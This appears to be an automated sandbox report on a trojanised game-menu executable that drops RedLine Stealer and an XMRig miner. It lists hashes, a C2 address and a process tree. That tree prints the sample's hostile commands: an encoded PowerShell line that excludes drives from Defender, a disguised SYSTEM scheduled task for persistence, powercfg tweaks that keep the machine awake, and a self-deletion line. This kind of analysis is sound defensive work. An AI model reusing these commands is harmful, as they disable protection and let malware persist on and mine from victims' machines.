Analysis

  • max time kernel
    151s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    15-04-2022 07:10

General

  • Target

    ReboundMenu_V4.15.3.exe

  • Size

    1.7MB

  • MD5

    11bee17705209c6aa6789c93d3789eaa

  • SHA1

    93098eab6c80fbd80d538385d1fafc5dd20500b2

  • SHA256

    484525c831d15dfb80c4355a6995f331a15e3a3bdeea43746e5d4000a16b27e6

  • SHA512

    b0bedfb38d641d0667dd14161f36bd3a16b80dbd54be9840cad88d04d97385334cd112176456f923b5e443d13b43227f5229a7ade644c1048ec704eb71de2fd2

Malware Config

Extracted

Family

redline

C2

185.186.142.127:6737

Attributes
  • auth_value

    69a1f5b6b455ba880252fbfe1168b351

Signatures

  • Meta Stealer Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ReboundMenu_V4.15.3.exe
    "C:\Users\Admin\AppData\Local\Temp\ReboundMenu_V4.15.3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Users\Admin\AppData\Local\Temp\fl.exe
        "C:\Users\Admin\AppData\Local\Temp\fl.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fl.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:408
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4640
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4568
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5100
            • C:\Windows\system32\powercfg.exe
              powercfg /x -hibernate-timeout-ac 0
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2636
            • C:\Windows\system32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4968
            • C:\Windows\system32\powercfg.exe
              powercfg /x -standby-timeout-ac 0
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4224
            • C:\Windows\system32\powercfg.exe
              powercfg /x -standby-timeout-dc 0
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3260
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachine" /tr "C:\Users\Admin\AppData\Roaming\charme.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5080
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachine" /tr "C:\Users\Admin\AppData\Roaming\charme.exe"
              6⤵
              • Creates scheduled task(s)
              PID:2884
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\charme.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5096
            • C:\Users\Admin\AppData\Roaming\charme.exe
              C:\Users\Admin\AppData\Roaming\charme.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1944
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\charme.exe"
                7⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3032
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5024
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
                    9⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4468
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3840
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -hibernate-timeout-ac 0
                    9⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1040
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -hibernate-timeout-dc 0
                    9⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4384
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -standby-timeout-ac 0
                    9⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4452
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -standby-timeout-dc 0
                    9⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1932
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  8⤵
                    PID:3812
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "vtowhpjpnxwsrik"
                      9⤵
                        PID:2168
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe aumdnvyddh1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0o0uNnhRclY6DcoQfJIkPc5ubji/PYICTS6YCivJp16OXyHB+WvLzMf4KQTl36jWiAqpPFFwujek1VkP9II8fKxesKjZLxzwmF/WZ/I0WqoFl0CEzXLG/No5YgMHiLom87fH1KSo63FDBNUmQTm7iowsSG1tGhG8IaKfn4rIMLuc7r5qhutURjZI+9zW3DqmPoFP+3nbkrxLDRxtRUmBHDH81T8M7FlEgSc+nu8grKK292smbuRhMgyC/0SqFZGS+/LDXdJhFimn5YqYVKsb9TjZV1tR8NqBhbVh1eRLowkab/dPtfJ0IiWdptcw7y0THB2KUFt7gaTNiYsAxIllIrSD9XeH8ilKRC1AuYRpU7G6PE1ZlfQNPkEnQ5T8ZDbZ/
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3824
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\fl.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4044
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 3
                  6⤵
                    PID:4164

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

          Filesize

          443B

          MD5

          8add56521ef894ef0c66ecd3e989d718

          SHA1

          2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

          SHA256

          01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

          SHA512

          af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          6d42b6da621e8df5674e26b799c8e2aa

          SHA1

          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

          SHA256

          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

          SHA512

          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        • C:\Users\Admin\AppData\Local\Temp\fl.exe

          Filesize

          4.1MB

          MD5

          798fa001d694999cda269d3af437dbbc

          SHA1

          22598970ba604e9b03475af8a7cab96408fb6547

          SHA256

          5270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46

          SHA512

          8e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7

        • C:\Users\Admin\AppData\Local\Temp\fl.exe

          Filesize

          4.1MB

          MD5

          798fa001d694999cda269d3af437dbbc

          SHA1

          22598970ba604e9b03475af8a7cab96408fb6547

          SHA256

          5270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46

          SHA512

          8e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7

        • C:\Users\Admin\AppData\Roaming\charme.exe

          Filesize

          4.1MB

          MD5

          798fa001d694999cda269d3af437dbbc

          SHA1

          22598970ba604e9b03475af8a7cab96408fb6547

          SHA256

          5270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46

          SHA512

          8e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7

        • C:\Users\Admin\AppData\Roaming\charme.exe

          Filesize

          4.1MB

          MD5

          798fa001d694999cda269d3af437dbbc

          SHA1

          22598970ba604e9b03475af8a7cab96408fb6547

          SHA256

          5270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46

          SHA512

          8e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7

        • memory/408-160-0x000001EDEFFF3000-0x000001EDEFFF5000-memory.dmp

          Filesize

          8KB

        • memory/408-159-0x000001EDEFFF0000-0x000001EDEFFF2000-memory.dmp

          Filesize

          8KB

        • memory/408-157-0x00007FF8A2D10000-0x00007FF8A37D1000-memory.dmp

          Filesize

          10.8MB

        • memory/408-153-0x000001EDEDD50000-0x000001EDEE168000-memory.dmp

          Filesize

          4.1MB

        • memory/1600-141-0x0000000004CD0000-0x0000000004D0C000-memory.dmp

          Filesize

          240KB

        • memory/1600-140-0x0000000004DA0000-0x0000000004EAA000-memory.dmp

          Filesize

          1.0MB

        • memory/1600-148-0x0000000007C30000-0x000000000815C000-memory.dmp

          Filesize

          5.2MB

        • memory/1600-149-0x0000000006A00000-0x0000000006A50000-memory.dmp

          Filesize

          320KB

        • memory/1600-146-0x0000000005E80000-0x0000000005E9E000-memory.dmp

          Filesize

          120KB

        • memory/1600-145-0x0000000006300000-0x00000000068A4000-memory.dmp

          Filesize

          5.6MB

        • memory/1600-144-0x0000000005CB0000-0x0000000005D42000-memory.dmp

          Filesize

          584KB

        • memory/1600-143-0x0000000005B70000-0x0000000005BE6000-memory.dmp

          Filesize

          472KB

        • memory/1600-142-0x0000000005000000-0x0000000005066000-memory.dmp

          Filesize

          408KB

        • memory/1600-147-0x0000000007530000-0x00000000076F2000-memory.dmp

          Filesize

          1.8MB

        • memory/1600-139-0x0000000004C70000-0x0000000004C82000-memory.dmp

          Filesize

          72KB

        • memory/1600-138-0x00000000051D0000-0x00000000057E8000-memory.dmp

          Filesize

          6.1MB

        • memory/1600-133-0x0000000000380000-0x00000000003A0000-memory.dmp

          Filesize

          128KB

        • memory/2168-207-0x000001873FBA0000-0x000001873FBA2000-memory.dmp

          Filesize

          8KB

        • memory/2168-205-0x000001873DDB0000-0x000001873DDB7000-memory.dmp

          Filesize

          28KB

        • memory/2168-206-0x00007FF8A2DC0000-0x00007FF8A3881000-memory.dmp

          Filesize

          10.8MB

        • memory/2168-208-0x000001873FBA3000-0x000001873FBA5000-memory.dmp

          Filesize

          8KB

        • memory/2996-131-0x0000000000C90000-0x0000000000E50000-memory.dmp

          Filesize

          1.8MB

        • memory/3032-195-0x0000022213770000-0x0000022213782000-memory.dmp

          Filesize

          72KB

        • memory/3032-184-0x0000022213943000-0x0000022213945000-memory.dmp

          Filesize

          8KB

        • memory/3032-183-0x0000022213940000-0x0000022213942000-memory.dmp

          Filesize

          8KB

        • memory/3032-182-0x00007FF8A2D10000-0x00007FF8A37D1000-memory.dmp

          Filesize

          10.8MB

        • memory/3812-190-0x0000000000400000-0x000000000040C000-memory.dmp

          Filesize

          48KB

        • memory/3812-193-0x0000000000400000-0x000000000040C000-memory.dmp

          Filesize

          48KB

        • memory/3824-201-0x0000000140000000-0x0000000140803000-memory.dmp

          Filesize

          8.0MB

        • memory/3824-204-0x0000000012B50000-0x0000000012B90000-memory.dmp

          Filesize

          256KB

        • memory/3824-203-0x0000000140000000-0x0000000140803000-memory.dmp

          Filesize

          8.0MB

        • memory/3824-202-0x00000000003D0000-0x00000000003F0000-memory.dmp

          Filesize

          128KB

        • memory/3824-200-0x0000000140000000-0x0000000140803000-memory.dmp

          Filesize

          8.0MB

        • memory/3824-198-0x0000000140000000-0x0000000140803000-memory.dmp

          Filesize

          8.0MB

        • memory/3824-209-0x00000000023D0000-0x00000000023F0000-memory.dmp

          Filesize

          128KB

        • memory/4468-186-0x00000209F3100000-0x00000209F3102000-memory.dmp

          Filesize

          8KB

        • memory/4468-181-0x00000209F3106000-0x00000209F3108000-memory.dmp

          Filesize

          8KB

        • memory/4468-187-0x00000209F3103000-0x00000209F3105000-memory.dmp

          Filesize

          8KB

        • memory/4468-185-0x00007FF8A2D10000-0x00007FF8A37D1000-memory.dmp

          Filesize

          10.8MB

        • memory/4568-158-0x0000029CF2906000-0x0000029CF2908000-memory.dmp

          Filesize

          8KB

        • memory/4568-161-0x00007FF8A2D10000-0x00007FF8A37D1000-memory.dmp

          Filesize

          10.8MB

        • memory/4568-162-0x0000029CF2900000-0x0000029CF2902000-memory.dmp

          Filesize

          8KB

        • memory/4568-156-0x0000029CF4B60000-0x0000029CF4B82000-memory.dmp

          Filesize

          136KB

        • memory/4568-163-0x0000029CF2903000-0x0000029CF2905000-memory.dmp

          Filesize

          8KB